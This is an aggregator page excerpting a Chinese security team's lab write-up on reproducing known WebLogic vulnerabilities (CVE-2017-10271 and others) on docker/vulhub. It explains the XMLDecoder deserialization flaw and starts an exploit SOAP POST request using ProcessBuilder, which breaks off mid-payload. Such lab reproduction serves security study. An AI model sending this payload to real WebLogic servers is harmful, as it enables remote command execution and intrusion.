看啥推荐读物
专栏名称: 寻云安全团队
理念:云闲|剑青 | 侠骨|初心 兴趣:希望你也是真的因为兴趣喜欢安全,而不是单纯的喜欢Money。 坚守:技术是把双刃剑,坚守道德和法律底线是学习交流的基础。 平等:技术领域无长幼尊卑,无任何附加属性Title,这里没有大佬没有前辈。
今天看啥  ›  专栏  ›  寻云安全团队

Weblogic常规漏洞复现合集

寻云安全团队  · 公众号  ·  · 2022-12-16 21:09
迟到的漏洞复现系列复现内容CVE-2017-10271 CVE-2018-2628 CVE-2018-2894 CVE-2020-14882和CVE-2020-14883ssrf以上复现均采用docker以及vulhub搭建CVE-2017-10271CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞,触发漏洞url如下:http://localhost:7001/wls-wsat/CoordinatorPortType 通过构造构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。exp如下POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: localhost:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 633soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> soapenv:Header>work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">java version="1.4.0" class="java.beans.XMLDecoder">void class="java.lang.ProcessBu ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照